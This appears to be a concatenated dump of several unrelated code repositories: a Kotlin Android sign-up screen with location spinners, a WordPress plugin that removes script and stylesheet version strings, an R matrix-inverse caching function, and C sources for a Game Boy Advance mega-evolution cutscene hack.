mSnackBar = Snackbar.make(findViewById(R.id.rootLayout), "You are online now.", Snackbar.LENGTH_LONG)
mSnackBar?.show()
}
}
override fun onResume() {
super.onResume()
ConnectivityReceiver.connectivityReceiverListener = this
}
override fun onNetworkConnectionChanged(isConnected: Boolean) {
showMessage(isConnected)
}
//ProgressBar
private var progressBar: ProgressBar? = null
fun setProgressBar(bar: ProgressBar) {
progressBar = bar
}
fun showProgressBar() {
progressBar?.visibility = View.VISIBLE
}
fun hideProgressBar() {
progressBar?.visibility = View.INVISIBLE
}
public override fun onStop() {
super.onStop()
hideProgressBar()
}
}<file_sep>package com.example.greenthumb_test
import android.os.Bundle
import android.view.View
import android.widget.AdapterView
import android.widget.ArrayAdapter
import android.widget.Toast
import androidx.appcompat.app.AppCompatActivity
import com.basgeekball.awesomevalidation.AwesomeValidation
import com.google.gson.GsonBuilder
import com.google.gson.JsonObject
import kotlinx.android.synthetic.main.activity_sign_up.*
import retrofit2.Call
import retrofit2.Callback
import retrofit2.Response
class SignUpActivity : AppCompatActivity(), AdapterView.OnItemSelectedListener {
val builder = GsonBuilder()
val gson = builder.serializeNulls().create()
private lateinit var countryList : Array<CountryData>
private lateinit var stateList : Array<StateData>
private lateinit var cityList : Array<CityData>
private lateinit var countryId :String
private lateinit var stateId:String
private lateinit var cityId:String
var user_type: Int = 1
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_sign_up)
toolbarSignUp.title=""
setSupportActionBar(toolbarSignUp)
supportActionBar!!.setDisplayHomeAsUpEnabled(true)
supportActionBar!!.setDisplayShowHomeEnabled(true)
countrySpinner.onItemSelectedListener = this
stateSpinner.onItemSelectedListener = this
citySpinner.onItemSelectedListener = this
countryApi()
radioSignUp.setOnCheckedChangeListener { group, checkedId ->
if (checkedId == R.id.rUser)
user_type = 1
if (checkedId == R.id.rProvider)
user_type = 2
if (checkedId == R.id.rConsultant)
user_type = 3
}
signUpButton.setOnClickListener {
val firstN = firstName.text.toString().trim()
val lastN = lastName.text.toString().trim()
val phone = phoneNumber.text.toString().trim()
val emailId = emailID.text.toString().trim()
val password = passwordText.text.toString().trim()
val cpassword = confirmPass.text.toString().trim()
if(firstN.isEmpty()){
firstName.error = "First Name required"
firstName.requestFocus()
return@setOnClickListener
}
if(lastN.isEmpty()){
lastName.error = "Last Name required"
lastName.requestFocus()
return@setOnClickListener
}
if(phone.isEmpty()){
phoneNumber.error = "Phone required"
phoneNumber.requestFocus()
return@setOnClickListener
}
if(emailId.isEmpty()){
emailID.error = "Email required"
emailID.requestFocus()
return@setOnClickListener
}
if(password.isEmpty()){
passwordText.error = "Password required"
passwordText.requestFocus()
return@setOnClickListener
}
if(cpassword.isEmpty()){
confirmPass.error = "Confirm Password required"
confirmPass.requestFocus()
return@setOnClickListener
}
if(cpassword != password){
confirmPass.error = "Dont match"
confirmPass.requestFocus()
return@setOnClickListener
}
Toast.makeText(this,cityId,Toast.LENGTH_SHORT).show()
callSignUpAPI(firstN,lastN,phone,password,user_type,emailId,countryId,cityId,stateId)
}
}
private fun countryApi() {
RetrofitClient.instance.countryList()
.enqueue(object : Callback<JsonObject>{
override fun onResponse(call: Call<JsonObject>, response: Response<JsonObject>) {
when{
response.code() == 200 -> {
CountrySpinnerLoad(response)
}
response.code() == 400 -> {
val res = gson.fromJson(response.errorBody()?.charStream(), Error::class.java)
}
}
}
override fun onFailure(call: Call<JsonObject>, t: Throwable) {
Toast.makeText(applicationContext, "Some error",Toast.LENGTH_SHORT).show()
}
})
}
private fun callSignUpAPI(
firstName: String,
lastName: String,
phone: String,
password: String,
userType: Int,
emailId: String,
country: String,
city: String,
state: String
) {
RetrofitClient.instance.userSignup(firstName, lastName,emailId,password,phone,country,state,city,userType)
.enqueue(object : Callback<JsonObject> {
override fun onResponse(
call: Call<JsonObject>,
response: Response<JsonObject>
) {
when {
response.code() == 400 -> {
val loginBase = gson.fromJson(response.errorBody()?.charStream(), Error::class.java)
Toast.makeText(applicationContext, loginBase.message, Toast.LENGTH_LONG).show()
}
response.code() == 200 -> {
val loginBase = gson.fromJson(response.body().toString(), SignupResponse::class.java)
Toast.makeText(applicationContext, loginBase.message, Toast.LENGTH_LONG).show()
if (loginBase.status == resources.getString(R.string.success)) {
Toast.makeText(applicationContext, loginBase.message, Toast.LENGTH_LONG).show()
}
}
else -> {
Toast.makeText(
applicationContext,
resources.getString(R.string.something_went),
Toast.LENGTH_LONG
).show()
}
}
} override fun onFailure(call: Call<JsonObject>, t: Throwable) {
}
})
}
override fun onSupportNavigateUp(): Boolean {
onBackPressed()
return true
}
override fun onNothingSelected(parent: AdapterView<*>?) {
TODO("Not yet implemented")
}
override fun onItemSelected(parent: AdapterView<*>?, view: View?, position: Int, id: Long) {
when(parent?.id) {
R.id.countrySpinner -> {
countryId = countryList.get(position).country_id
RetrofitClient.instance.stateList(countryId)
.enqueue(object : Callback<JsonObject>{
override fun onResponse(call: Call<JsonObject>, response: Response<JsonObject>) {
when{
response.code() == 200 -> {
StateSpinnerLoad(response)
}
response.code() == 400 -> {
val res = gson.fromJson(response.errorBody()?.charStream(), Error::class.java)
}
}
}
override fun onFailure(call: Call<JsonObject>, t: Throwable) {
Toast.makeText(applicationContext, "Some error",Toast.LENGTH_SHORT).show()
}
})
}
R.id.stateSpinner -> {
stateId = stateList.get(position).state_id
RetrofitClient.instance.cityList(stateId)
.enqueue(object : Callback<JsonObject>{
override fun onResponse(call: Call<JsonObject>, response: Response<JsonObject>) {
when{
response.code() == 200 -> {
CitySpinnerLoad(response)
}
response.code() == 400 -> {
val res = gson.fromJson(response.errorBody()?.charStream(), Error::class.java)
}
}
}
override fun onFailure(call: Call<JsonObject>, t: Throwable) {
}
})
}
R.id.citySpinner -> {
cityId = cityList.get(position).city_id
}
}
}
private fun CountrySpinnerLoad(response: Response<JsonObject>) {
val res = gson.fromJson(response.body().toString(), CountryResponse::class.java)
countryList = res.data.toTypedArray()
var country = arrayOfNulls<String>(countryList.size)
for (i in countryList.indices) {
country[i] = countryList[i].country_name
}
val adapter = ArrayAdapter(this@SignUpActivity, android.R.layout.simple_spinner_item,country)
adapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item)
countrySpinner.adapter = adapter
}
private fun CitySpinnerLoad(response: Response<JsonObject>) {
val res = gson.fromJson(response.body().toString(), CityResponse::class.java)
cityList = res.data.toTypedArray()
var city = arrayOfNulls<String>(cityList.size)
for (i in cityList.indices) {
city[i] = cityList[i].city_name
}
val adapter = ArrayAdapter(this@SignUpActivity, android.R.layout.simple_spinner_item,city)
adapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item)
citySpinner.adapter = adapter
}
private fun StateSpinnerLoad(response: Response<JsonObject>) {
val res = gson.fromJson(response.body().toString(), StateResponse::class.java)
stateList = res.data.toTypedArray()
var state = arrayOfNulls<String>(stateList.size)
for (i in stateList.indices) {
state[i] = stateList[i].state_name
}
val adapter = ArrayAdapter(this@SignUpActivity, android.R.layout.simple_spinner_item,state)
adapter.setDropDownViewResource(android.R.layout.simple_spinner_dropdown_item)
stateSpinner.adapter = adapter
}
}
<file_sep>package com.example.greenthumb_test
data class CityData(
val city_id: String,
val city_name: String
)
<file_sep>rootProject.name='Greenthumb_test'
include ':app'
<file_sep>package com.example.greenthumb_test
data class CountryData(
val country_id: String,
val country_name: String
)<file_sep>package com.example.greenthumb_test
data class CountryResponse(
val data: List<CountryData>,
val message: String,
val status: String
)<file_sep>package com.example.greenthumb_test
data class LoginResponse(val status: String, val message:String, val data: User)<file_sep>package com.example.greenthumb_test
data class CityResponse(
val data: List<CityData>,
val message: String,
val status: String
)
<file_sep>package com.example.greenthumb_test
data class SignupResponse(val status: String, val message:String, val data: User)<file_sep>package com.example.greenthumb_test
data class StateResponse(
val data: List<StateData>,
val message: String,
val status: String
)
<file_sep>package com.example.greenthumb_test
data class StateData(
val state_id: String,
val state_name: String
)
|
204cbeee46ca8ebb181d6492c0c9eb764f9b164b
|
[
"Kotlin",
"Gradle"
] | 12 |
Kotlin
|
sys029/greenthumb_test
|
7e39113afbcb7955b7ee96942ae26582405a4935
|
6b3b77dcb03724068326d7424a4795fdd864dc9d
|
refs/heads/master
|
<file_sep><?php
/*
Plugin Name: Remove Script & Stylesheet Versions
Description: Removes the version string (?ver=) from scripts and stylesheets.
Author: Kawauso
Version: 1.0
*/
function rssv_scripts() {
global $wp_scripts;
if ( !is_a( $wp_scripts, 'WP_Scripts' ) )
return;
foreach ( $wp_scripts->registered as $handle => $script )
$wp_scripts->registered[$handle]->ver = null;
}
function rssv_styles() {
global $wp_styles;
if ( !is_a( $wp_styles, 'WP_Styles' ) )
return;
foreach ( $wp_styles->registered as $handle => $style )
$wp_styles->registered[$handle]->ver = null;
}
add_action( 'wp_print_scripts', 'rssv_scripts', 100 );
add_action( 'wp_print_footer_scripts', 'rssv_scripts', 100 );
add_action( 'admin_print_styles', 'rssv_styles', 100 );
add_action( 'wp_print_styles', 'rssv_styles', 100 );<file_sep>=== Remove Script & Stylesheet Versions ===
Contributors: Kawauso
Tags: version, script, stylesheets
Requires at least: 3.0
Tested up to: 3.1
Stable tag: 1.0
Removes the ?ver= parameter from enqueued scripts and stylesheets URLs.
== Description ==
Removes the version parameter from scripts and stylesheets enqueued by WordPress' `wp_enqueue_script()` and `wp_enqueue_style()` functions.
== Installation ==
1. Upload `remove-script-style-versions.php` to the `/wp-content/plugins/` directory
1. Activate the plugin through the 'Plugins' menu in WordPress
== Changelog ==
= 1.0 =
* First public release
|
725a817d563ae0937a4b2e3a06f0eceec40353f8
|
[
"Text",
"PHP"
] | 2 |
PHP
|
WPPlugins/remove-script-stylesheet-versions
|
ead5b0659808faf69ef746f01ba1d838bd4268c4
|
102b9f99df395491465ea3ec235dccd1a4842e4d
|
refs/heads/master
|
<file_sep>## These functions allow to cache the computed inverse of a matrix in order to avoid repeated
## computations of the same inverse matrix
## This function creates a special matrix that can cache its inverse
makeCacheMatrix <- function(x = matrix()) {
i <- NULL
set <- function(y) {
x <<- y
i <<- NULL
}
get <- function () x
setsolve <- function(solve) i <<- solve
getsolve <- function () i
list (set = set, get = get,
setsolve = setsolve,
getsolve = getsolve)
}
## This function computes the inverse of the matrix returned by makeCacheMatrix
## If the inverse has already been calculated for the matrix the inverse is retrieved from the cache
cacheSolve <- function(x, ...) {
## Return a matrix that is the inverse of 'x'
i <- x$getsolve()
if(!is.null(i)) {
message("getting cached data")
return(i)
}
data <- x$get()
i <- solve(data, ...)
x$setsolve(i)
i
}
|
1f501f4b6d91000dbea1cf4d25515ec90d2b9b85
|
[
"R"
] | 1 |
R
|
BobT3d/ProgrammingAssignment2
|
b3b3670a8dee6848528ad29f956d85f5a0944142
|
a75366b253a66110e65a1d42dea5bace39739cbb
|
refs/heads/master
|
<repo_name>EternalCode/mega-evolution-cutscene<file_sep>/src/engine/text/textboxes.c
#include "..\types.h"
#include "string_funcs.h"
#include "textboxes.h"
#include"..\character_control\buttons\buttons.h"
// draw text
void task_text_draw(u8 task_id) {
struct task* task = &tasks[task_id];
switch (task->priv[0]) {
case 0:
{
struct rbox this_box = {0x0, 0x0, 0x2, 0x1E, 0x0D, 0x0F, 0x1, 0x20100};
u8 r_id = rbox_get_id_something(&this_box);
task->priv[1] = r_id;
rboxid_clear_pixels(r_id, 0);
rboxid_tilemap_update(r_id);
rboxid_upload_a(r_id, 3);
task->priv[0]++;
break;
}
case 1:
{
if (sub_807F3A4(task_id, string_buffer, 2, 8) << 24) {
task->priv[0]++;
}
break;
}
case 2:
{
u8 r_id = (task->priv[1] & 0xFF); //rbox id, byte
rboxid_80040B8(r_id);
rboxid_upload_a(r_id, 1);
rboxid_8003E3C(r_id);
task->priv[0]++;
break;
}
case 3:
{
if (sub_807E418() == 1) {
superstate.multipurpose_state_tracker++;
task_del(task_id);
}
break;
}
case 4:
{
task->priv[0] = 0;
break;
}
default:
task->priv[0]--;
break;
};
return;
}
u8 draw_text(u8 delay, char *string) {
str_cpy(string_buffer, string);
u8 t_id = task_add(task_text_draw, 0xA);
tasks[t_id].priv[0] = delay;
return t_id;
}
void multichoice_box(char **options, u8 option_number, struct rbox* box, u8 state_id) {
u8 box_id = rbox_get_id_something(box);
box_curved(box_id, 1);
rboxid_clear_pixels(box_id, 0x11);
u8 i;
for (i = 0; i < option_number; i++) {
box_print(box_id, 2, 8, (1 + (16 * i)), 1, 0, options[i]);
}
u8 f_id = fboxid_get_field(2, 1);
sub_810F7D8(box_id, 2, 0, 1, f_id +2, 2, 0);
rboxid_upload_a(box_id, 3);
u8 t_id = task_add(wait_select +1, 1);
tasks[t_id].priv[13] = box_id;
tasks[t_id].priv[0] = state_id;
tasks[t_id].priv[1] = option_number;
}
void wait_select(u8 task_id) {
struct task *task = &tasks[task_id];
u16 option = sub_810FA04();
if (option == -1) {
return;
} else {
if (option < task->priv[1]) {
temp_vars.var_800D = option;
sub_0812FFF0(task_id); //normally sets another task, but we del task
task_del(task_id);
superstate.multipurpose_state_tracker = task->priv[0];
}
return;
}
}
void msg_normal (char *str){
// Bg_id, x, y, w, h, color, leave, leave
struct rbox msg_normal = {0, 2, 15, 0x19, 0x4, rboxes[0].pal_id, 0x1, 0};
u8 box_id = rbox_get_id_something(&msg_normal);
box_curved(box_id, 1);
rboxid_tilemap_update(box_id);
rboxid_clear_pixels(box_id, 17);
box_related_one(box_id, 2, str, 1, 0, 2, 1, 3);
rboxid_upload_a(box_id, 3);
}<file_sep>/src/engine/objectss.h
#ifndef ENGINE_OBJECTS_H
#define ENGINE_OBJECTS_H
struct object;
typedef void (*object_callback)(struct object*);
typedef struct frame {
u16 data;
u16 duration;
} frame;
struct rotscale_frame {
u16 scale_delta_x;
u16 scale_delta_y;
u8 rotation_delta;
u8 duration;
u16 field_6;
};
struct attr0 {
u8 y;
u8 rot_scale_flag : 1;
u8 doublesize_disable_flag : 1; // if rotscale 0, disable obj. Else double size
u8 obj_mode : 2; // 0 normal, 1 semi transparent, 2 obj window, 3 prohibited
u8 obj_mosaic : 1;
u8 color_mode : 1; // 16 or 256
u8 obj_shape : 2; // 0=Square,1=Horizontal,2=Vertical
};
struct attr1 {
u16 x : 9;
u16 rot_scale : 3;
u16 h_flip : 1;
u16 v_flip : 1;
u16 obj_size : 2;
};
struct attr2{
u16 tile_num : 10;
u16 priority : 2;
u16 pal_num : 4;
};
struct sprite {
//struct attr0 attr0;
//struct attr1 attr1;
//struct attr2 attr2;
u8 y;
u8 flags1;
u8 x;
u8 msbx_flags;
u16 locs;
u16 rotscale;
};
struct resource {
u8 *graphics;
u16 size;
u16 tag;
};
struct objtemplate {
u16 tiles_tag;
u16 pal_tag;
struct sprite *oam;
struct frame **animation;
struct resource *graphics;
struct rotscale_frame *rotscale;
object_callback callback;
};
struct object {
struct sprite final_oam;
struct frame **animation_table;
u8 *gfx_table;
struct rotscale_frame **rotscale_table;
struct objtemplate *template;
u32 field18;
object_callback callback;
u16 x;
u16 y;
u16 x2;
u16 y2;
u8 x_centre;
//u8 y_centre;
u8 anim_number;
u8 anim_frame;
u8 anim_delay;
u8 counter;
u16 private[8];
u8 bitfield2;
u8 bitfield;
u16 anim_data_offset;
u8 field42;
u8 field43;
};
struct tagged_pal {
u8 *pal_ptr;
u16 pal_tag;
u16 padding;
};
extern struct object objects[64];
u8 *obj_ids_to_display;
struct sprite * poke_oam_battle;
struct frame ** anim_poke;
struct rotscale_frame **rotscale_empty;
object_callback oac_nullsub;
u8 template_instanciate_forward_search(struct objtemplate *, u8, u8, u8);
u8 template_instanciate_reverse_search(struct objtemplate *, u8, u8, u8);
void obj_delete(struct object *);
void obj_delete_and_free_tiles(struct object *);
void gpu_tile_obj_alloc_tag_and_upload(struct resource *);
void gpu_pal_obj_alloc_tag_and_apply(struct tagged_pal *);
u8 obj_id_from_obj(struct object *obj) {
u32 pointer = (u8 *)obj - (u8 *)objects;
return ((u32)pointer / 0x44);
}
#endif /* ENGINE_OBJECTS_H */
<file_sep>/src/graphics/BGs/BG.c
#include "../../types.h"
#include "BG.h"
u8 *gpu_pal_tag_search_lower_boundary = (u8 *)0x03003E58;
void gpu_pal_apply(u8 *, u16, u8);
void lz77UnCompVram(void *src, void *dst);
void lcd_io_set(u32, u32);
void setup_ioregs_bg() {
u8 i;
for (i = 0; i < 4; i ++) {
BG_CNT[i].priority = i;
BG_CNT[i].char_index = i;
BG_CNT[i].padding = 0;
BG_CNT[i].mosiac = 0;
BG_CNT[i].color = 0;
BG_CNT[i].map_index = (0x1F - i);
BG_CNT[i].screen_over = 0;
BG_CNT[i].size = 0;
}
lcd_io_set(0x50, 0x2F00);
lcd_io_set(0x52, 0x0F);
}
// copy BG into area
void set_bg(u8 bg_id, u8 *gfx, u8 *tile_map, u8 *pal, u8 pal_slot, u8 pal_size) {
void *char_base = (void *)0x6000000 + (0x4000 * bg_id);
void *map_base = (void *)0x6000000 + (0xF800 - (0x800 * bg_id));
lz77UnCompVram(gfx, char_base);
lz77UnCompVram(tile_map, map_base);
gpu_pal_apply(pal, pal_slot * 16, pal_size);
gpu_sync_bg_show(bg_id);
}
void load_trainer_bg(u8 gender) {
if (gender) {
// girl
//set_bg(2, (u8 *)&hero2_tiles, (u8 *)hero2_map, (u8 *)hero2_pal, 0, 0x20);
} else {
// boy
//set_bg(2, (u8 *)&hero1_tiles, (u8 *)hero1_map, (u8 *)hero1_pal, 0, 0x20);
}
}<file_sep>/src/engine/structs_data.h
#ifndef WRAM_STRUCTS_DATA_H
#define WRAM_STRUCTS_DATA_H
/*Walkrun state*/
struct walkrun {
u8 bitfield;
u8 bike;
u8 running2;
u8 running1;
u8 oamid;
u8 npcid;
u8 lock;
u8 gender;
u8 xmode;
u8 field9;
u8 fielda;
u8 fieldb;
u16 fieldc;
u16 field14;
u8 field18;
u8 field19;
u16 field1A;
u16 most_recent_override_tile;
};
extern struct walkrun walkrun_state;
/* sav2 structure */
struct saveblock_trainerdata {
struct sav2 *sav2;
};
struct sav2 {
char name[8];
u8 gender;
u8 padding;
u16 trainer_id;
u16 secret_id;
u16 hours;
u8 minutes;
u8 seconds;
u8 frames;
u8 options_button_style;
u8 options_text_speed;
u8 options_battle_style[7];
u32 field_1C;
u8 field_20[8];
u8 pokemon_flags_3[52];
u8 pokemon_flags_4[52];
u8 field_90[1044];
u8 fourCharacters[4];
u8 field_4A8[1008];
u8 mapdata[1672];
u32 bag_item_quantity_xor_value;
u8 field_F24[127];
u8 last_byte_in_sav2;
};
extern struct saveblock_trainerdata saveblock2;
/* vars */
struct temp_vars {
// Only 0x8000s here
u16 var_8000;
u16 var_8001;
u16 var_8002;
u16 var_8003;
u16 var_8004;
u16 var_8005;
u16 var_8006;
u16 var_8007;
u16 var_8008;
u16 var_8009;
u16 var_800A;
u16 var_800B;
u16 var_800D;
u16 var_800F;
u16 var_800C;
u16 var_8010;
u16 var_8011;
};
extern struct temp_vars temp_vars;
struct pokemon {
u32 PID;
u32 OTID;
char name[10];
u16 language;
u8 OT_name[7];
u8 markings;
u16 checksum;
u16 padding_maybe;
u8 data[48];
u32 ailment;
u8 level;
u8 pokerus;
u16 current_hp;
u16 total_hp;
u16 attack;
u16 defense;
u16 speed;
u16 sp_attack;
u16 sp_defense;
};
extern struct pokemon player_party[6];
extern struct pokemon opponent_party[6];
#endif /* WRAM_STRUCTS_DATA_H */
<file_sep>/src/engine/text/textboxes.h
#ifndef TEXTBOXES_H
#define TEXTBOXES_H
#include "../types.h"
#include "../engine/tasks.h"
#include "../structs_data.h"
/* Rboxes */
struct rbox {
u8 bg_id;
u8 x;
u8 y;
u8 w;
u8 h;
u8 pal_id;
u16 vram_tile_offset;
u32 pixels;
};
extern struct rbox rboxes[32];
// dual choice rbox
struct rbox msg_dual_choice = {0x0, 0x14, 0x7, 0x5, 0x4, 0xF, 0x174, 0x6020200};
u8 rbox_get_id_something(struct rbox*);
void rboxid_clear_pixels(u8, u8);
void rboxid_tilemap_update(u8);
void rboxid_upload_a(u8, u8);
void rboxid_80040B8(u8);
void rboxid_8003E3C(u8);
u8 fboxid_get_field(u8, u8);
void box_print(u8, u8, u8, u8, u8, u8, char*);
void sub_810F7D8(u8, u8, u8, u8, u8, u8, u8);
void box_curved(u8, u8);
void box_related_one(u8, u8, char *, u8, u8, u8, u8, u8);
u8 remoid_a_pressed_maybe(u8);
void sub_0812FFF0(u8);
void rboxes_free(void);
void msg_normal(char *);
void wait_select(u8);
void multichoice_box(char **, u8, struct rbox *,u8);
u8 sub_807F3A4(u8, char *, u8, u8);
u16 sub_810FA04(void);
u8 sub_807E418(void);
#endif /* TEXTBOXES_H */<file_sep>/src/graphics/OBJs/oam.c
#include "../../types.h"
#include "../../../gfx/gfx_resources.h"
#include "../../structs_data.h"
#include "../../tables.h"
void LZ77UnCompAnyRAM(u8 *src, u8 *dst, u8 id);
void lz77UnCompVram(void* src, void* dst);
u8 gpu_pal_alloc_new(u16);
void pal_decompress_slice_to_faded_and_unfaded(void* src, u16 start, u16 end);
void gpu_pal_upload(void);
void *malloc_and_clear(u32);
void fighter_gfx_init(u8 controller, u16 species) {
// void *memcpy(void *str1, const void *str2, u32 n);
u16 oam_attr1 = (0x8004 + (0xCC * controller));
if (!controller) {
oam_attr1 |= 0x1000;
}
u16 oam_fighter[] = {0x1076, oam_attr1, (16 *(FRAME_COUNT) * controller)};
u16 *oam = (u16 *)(0x7000000 + (8 * controller));
u8 i;
for (i = 0; i < 3; i ++) {
*oam = oam_fighter[i];
oam++;
}
void gpu_pal_apply(u8 *pal, u16 pal_slot, u8 pal_size);
gpu_pal_apply(fighter_gfx[(species << 1) + 1], 16 * 16 ,32);
lz77UnCompVram((void *)fighter_gfx[species << 1], (void *)oam_ram_partition[controller]);
}<file_sep>/src/engine/tasks.h
#ifndef TASKS_H
#define TASKS_H
#include "../types.h"
/* Tasks system */
typedef void (*task_callback)(u8);
struct task {
task_callback function;
bool inuse;
u8 prev;
u8 next;
u8 priority;
u16 priv[16];
};
u8 task_add(task_callback func, u8 priority);
void task_del(u8 id);
void task_exec(void);
extern struct task tasks[16];
#endif /* TASKS_H */<file_sep>/src/buttons.h
#ifndef BUTTONS_H
#define BUTTONS_H
#include "../../types.h"
/* Button definitions */
#define KEYA 1
#define KEYB 2
#define KEYSELECT 4
#define KEYSTART 8
#define KEYRIGHT 16
#define KEYLEFT 32
#define KEYUP 64
#define KEYDOWN 128
#define KEYR 256
#define KEYL 512
struct sprite {
//struct attr0 attr0;
//struct attr1 attr1;
//struct attr2 attr2;
u8 y;
u8 flags1;
u8 x;
u8 msbx_flags;
u16 locs;
u16 rotscale;
};
/* Super state */
typedef void (*super_callback)(void);
struct super {
super_callback callback1;
super_callback callback2;
super_callback callback2backup;
super_callback callback_vblank;
super_callback callback_hblank;
u32 field_14;
u32 field_18;
u32 bit_to_wait_for;
u32 *ptr_vblank_counter;
u32 field_24;
u16 buttons_held;
u16 buttons_new;
u16 buttons_held_remapped;
u16 buttons_new_remapped;
u16 buttons_new_and_key_repeat;
u32 keypad_countdown;
u32 unused_padding;
struct sprite sprites[128];
u8 multipurpose_state_tracker;
u8 gpu_sprites_upload_skip;
};
extern struct super superstate;
#endif /* BUTTONS_H */<file_sep>/README.md
# mega-evolution-cutscene
Cutscene during mega evolution
<file_sep>/src/main.c
#include "types.h"
#include "character_control\buttons\buttons.h"
#include "character_control\controls\player_movement.c"
#include ".\graphics\BGs\BG.c"
//#include ".\graphics\OBJs\oam.c"
#include ".\text\textboxes.h"
#include "..\gfx\gfx_resources.h"
#include "engine\tasks.h"
#include "character_control.c"
/* Funcs */
void overworld_free_bgmaps(void);
void pal_fade_control_and_dead_struct_reset(void);
void gpu_tile_bg_drop_all_sets(u8);
void palette_bg_faded_fill_black(void);
void vblank_handler_set(u8);
void hblank_handler_set(u8);
void CpuSet(void *src, void *dst, uint mode);
void obj_and_aux_reset_all(void);
void tasks_init(void);
void gpu_pal_allocator_reset(void);
void set_callback2(super_callback);
void gpu_sync_bg_hide(u8);
void gpu_sprites_upload(void);
void copy_queue_process(void);
void gpu_pal_upload(void);
void fade_screen(u32, u8, u8, u8, u32);
void help_system_disable__sp198(void);
void current_map_music_set(u16);
void remoboxes_acknowledge(void);
void task_exec(void);
void objc_exec(void);
void obj_sync_something(void);
void audio_play(u8);
void vblank_cb() {
// deals with copying data from FR's high level structs in
// WRAM into approriate RAM addresses.
//gpu_sprites_upload();
//copy_queue_process();
gpu_pal_upload();
}
// reset screen attributes
void setup() {
// callbacks
vblank_handler_set(0);
hblank_handler_set(0);
set_callback2((super_callback)0x812EB11);
// BGs
overworld_free_bgmaps();
gpu_tile_bg_drop_all_sets(0);
int src_zero = 0;
CpuSet(&src_zero, (void *)0x6000000, (uint)0x5006000);
// pals
pal_fade_control_and_dead_struct_reset();
palette_bg_faded_fill_black();
pal_fade_control_and_dead_struct_reset();
gpu_pal_allocator_reset();
*gpu_pal_tag_search_lower_boundary = 0;
// objs
obj_and_aux_reset_all();
// tasks
tasks_init();
// more BG setup
superstate.callback_vblank = vblank_cb;
setup_ioregs_bg();
bgid_mod_x_offset(0, 0, 0);
bgid_mod_y_offset(0, 0, 0);
bgid_mod_x_offset(1, 0, 0);
bgid_mod_y_offset(1, 0, 0);
bgid_mod_x_offset(2, 0, 0);
bgid_mod_y_offset(2, 0, 0);
bgid_mod_x_offset(3, 0, 0);
bgid_mod_y_offset(3, 0, 0);
remoboxes_acknowledge();
rboxes_free();
}
u16 bgid_get_y_offset(u8);
u16 bgid_get_x_offset(u8);
void sky_scroll(u8 task_id) {
bgid_mod_x_offset(0, bgid_get_x_offset(0) + 64, 0);
}
extern void test();
void battle_ground_make() {
task_exec();
objc_exec();
obj_sync_something();
//tilemaps_sync();
switch (superstate.multipurpose_state_tracker) {
case 0:
{
temp_vars.var_8001 = 0;
/*// REG_DISPCNT setup
REG_DISPCNT.mode = 2;
REG_DISPCNT.GBC_mode = 0;
REG_DISPCNT.frame_select = 0;
REG_DISPCNT.hblank_oam_process = 0;
REG_DISPCNT.sprite_tile_mapping = 0; //2d or 3d mapping
REG_DISPCNT.screen_blank = 0;
REG_DISPCNT.BG0_enable = 1;
REG_DISPCNT.BG1_enable = 1;
REG_DISPCNT.BG2_enable = 1;
REG_DISPCNT.BG3_enable = 0;
REG_DISPCNT.sprite_enable = 1;
REG_DISPCNT.win0_enable = 0;
REG_DISPCNT.win1_enable = 0;
REG_DISPCNT.oam_win_enable = 0;
temp_vars.var_8000 = *DISPCNT;
// REG_BGCNT
u8 i;
for (i = 0; i < 4; i ++) {
BG_CNT[i].priority = i;
BG_CNT[i].char_index = i;
BG_CNT[i].padding = 0;
BG_CNT[i].mosiac = 0;
BG_CNT[i].color = 0;
BG_CNT[i].map_index = (0x1F - i);
BG_CNT[i].screen_over = 0;
BG_CNT[i].size = 0;
}
BG_CNT[1].color = 1;
lcd_io_set(0x50, 0x2F00);
lcd_io_set(0x52, 0x0F);*/
test();
superstate.multipurpose_state_tracker++;
break;
}
case 1:
{
// load VRAM BG background
u8 bg_config_data[16] = {0xF0, 0x11, 0x0, 0x0, 0xE5, 0x09, 0x0, 0x0, 0xDA, 0x21, 0x0, 0x0, 0xCF, 0x31, 0x0, 0x0};
void bg_vram_setup(u8, u8 *, u8);
// mode, setup, amount of bgs to config
bg_vram_setup(0, (u8 *)&bg_config_data, 4);
set_bg(0, (u8 *)sky_tiles, (u8 *)sky_map, (u8 *)sky_pal, 6, 32);
set_bg(1, (u8 *)tree_tiles, (u8 *)tree_map, (u8 *)tree_pal, 0, 160);
superstate.multipurpose_state_tracker++;
break;
}
case 2:
{
// wtb better clouds
task_add(sky_scroll, 0x1);
superstate.multipurpose_state_tracker++;
break;
}
case 3:
{
void gpu_bg_config_set_field(u8, u8, u8);
gpu_bg_config_set_field(0, 5, 1);
superstate.multipurpose_state_tracker++;
break;
}
case 4:
{
make_player(0);
make_opponent(0);
superstate.multipurpose_state_tracker++;
break;
}
case 5:
{
player_char_movement();
break;
}
case 99:
{
// waitstate + next command buffer
player_movement_buffer();
break;
}
default:
break;
};
}
void zinit_scene() {
superstate.multipurpose_state_tracker = 0;
help_system_disable__sp198();
setup();
superstate.callback1 = (super_callback)(battle_ground_make + 1);
superstate.callback2 = 0;
};
<file_sep>/src/graphics/BGs/BG.h
#ifndef BG_H
#define BG_H
// 0x04000000
struct REG_DISPCNT {
u16 mode : 3;
u16 GBC_mode : 1;
u16 frame_select : 1;
u16 hblank_oam_process : 1;
u16 sprite_tile_mapping : 1;
u16 screen_blank : 1;
u16 BG0_enable : 1;
u16 BG1_enable : 1;
u16 BG2_enable : 1;
u16 BG3_enable : 1;
u16 sprite_enable : 1;
u16 win0_enable : 1;
u16 win1_enable : 1;
u16 oam_win_enable : 1;
};
extern struct REG_DISPCNT REG_DISPCNT;
u16 *DISPCNT = (u16 *)0x04000000;
// 0x04000004
struct REG_DISPSTAT {
u8 vertical_refresh : 1;
u8 horizontal_refresh : 1;
u8 vcount_trigger : 1;
u8 vblank_irq : 1;
u8 hblank_irq : 1;
u8 unused : 2;
u8 vcount_line_trigger;
};
extern struct REG_DISPSTAT REG_DISPSTAT;
// 0x04000006
extern u16 *REG_vcount;
// 0x04000008 - 0x0400000E
struct REG_BGCNT {
u16 priority : 2;
u16 char_index : 2; // 0x6000000 + char_index * 0x4000
u16 padding : 2;
u16 mosiac : 1;
u16 color : 1; // 256 or 16
u16 map_index : 5;
u16 screen_over : 1;
u16 size : 2;
/*
For "text" backgrounds:
00 : 256x256 (32x32 tiles)
01 : 512x256 (64x32 tiles)
10 : 256x512 (32x64 tiles)
11 : 512x512 (64x64 tiles)
For rotational backgrounds:
00 : 128x128 (16x16 tiles)
01 : 256x256 (32x32 tiles)
